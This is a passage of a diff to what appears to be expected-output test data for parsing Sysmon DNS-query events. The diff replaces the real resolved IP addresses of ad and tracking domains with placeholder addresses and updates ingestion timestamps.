ib.anycast.adnxs.com;::ffff:68.67.179.228;::ffff:68.67.180.44;::ffff:204.13.192.141;::ffff:68.67.178.230;::ffff:68.67.178.252;::ffff:68.67.179.23;::ffff:68.67.179.232;::ffff:68.67.180.12;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053938800Z'/\u003e\u003cEventRecordID\u003e189\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.308\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esecure.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 g.geogslb.com;type: 5 ib.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", @@ -17174,12 +16977,12 @@ "type": "CNAME" }, { - "data": "204.154.111.122", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "network": { 
@@ -17196,13 +16999,13 @@ "tps.doubleverify.com" ], "ip": [ - "204.154.111.122" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742430400Z", + "ingested": "2021-12-09T13:50:23.457533300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.053949300Z'/\u003e\u003cEventRecordID\u003e190\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.478\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etps.doubleverify.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.053Z", 
@@ -17266,39 +17069,39 @@ "type": "CNAME" }, { - "data": "52.71.175.22", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.71.208.229", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.201.172", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.7.6.198", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.156.164", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.152.56.202", + "data": "89.160.20.156", "type": "A" }, { - "data": "54.164.15.83", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.86.191.75", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17306,22 +17109,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -17337,23 +17140,16 @@ "i.liadm.com" ], "ip": [ - "52.71.175.22", - "52.71.208.229", - "52.86.201.172", - "52.7.6.198", - "54.152.156.164", - "54.152.56.202", - "54.164.15.83", - "52.86.191.75", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742439400Z", + "ingested": "2021-12-09T13:50:23.457539400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
idaas-production.us-east-1.elasticbeanstalk.com;::ffff:52.71.175.22;::ffff:52.71.208.229;::ffff:52.86.201.172;::ffff:52.7.6.198;::ffff:54.152.156.164;::ffff:54.152.56.202;::ffff:54.164.15.83;::ffff:52.86.191.75;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067752300Z'/\u003e\u003cEventRecordID\u003e191\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.536\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ei.liadm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 idaas-production.us-east-1.elasticbeanstalk.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17413,11 +17209,11 @@ }, "answers": [ { - "data": "67.231.251.189", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17425,7 +17221,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17433,7 +17229,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17441,7 +17237,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17449,7 +17245,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -17457,23 +17253,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
@@ -17488,24 +17284,24 @@ "pixel.s3xified.com" ], "ip": [ - "67.231.251.189", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742448600Z", + "ingested": "2021-12-09T13:50:23.457545200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:67.231.251.189;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067766000Z'/\u003e\u003cEventRecordID\u003e192\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.544\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.s3xified.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17565,15 +17361,15 @@ }, "answers": [ { - "data": "104.20.252.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "104.20.253.85", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -17581,7 +17377,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -17589,7 +17385,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -17597,7 +17393,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -17605,22 +17401,22 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { 
@@ -17635,23 +17431,22 @@ "router.infolinks.com" ], "ip": [ - "104.20.252.85", - "104.20.253.85", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742457200Z", + "ingested": "2021-12-09T13:50:23.457551Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:104.20.252.85;::ffff:104.20.253.85;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067776600Z'/\u003e\u003cEventRecordID\u003e193\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003erouter.infolinks.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", @@ -17711,57 +17506,57 @@ }, "answers": [ { - "data": "94.23.171.206", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.137.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.128.108", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.73.243", + "data": "89.160.20.156", "type": "A" }, { - "data": "94.23.144.220", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.228.78", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.27.173", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.252.5", + "data": "89.160.20.156", "type": "A" }, { - "data": "188.165.4.142", + "data": "89.160.20.156", "type": "A" }, { - "data": "87.98.242.60", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { 
@@ -17776,22 +17571,13 @@ "grey.erne.co" ], "ip": [ - "94.23.171.206", - "188.165.137.78", - "87.98.128.108", - "94.23.73.243", - "94.23.144.220", - "87.98.228.78", - "188.165.27.173", - "87.98.252.5", - "188.165.4.142", - "87.98.242.60" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742466200Z", + "ingested": "2021-12-09T13:50:23.457557300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:94.23.171.206;::ffff:188.165.137.78;::ffff:87.98.128.108;::ffff:94.23.73.243;::ffff:94.23.144.220;::ffff:87.98.228.78;::ffff:188.165.27.173;::ffff:87.98.252.5;::ffff:188.165.4.142;::ffff:87.98.242.60;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067787900Z'/\u003e\u003cEventRecordID\u003e194\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003egrey.erne.co\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:09.067Z", 
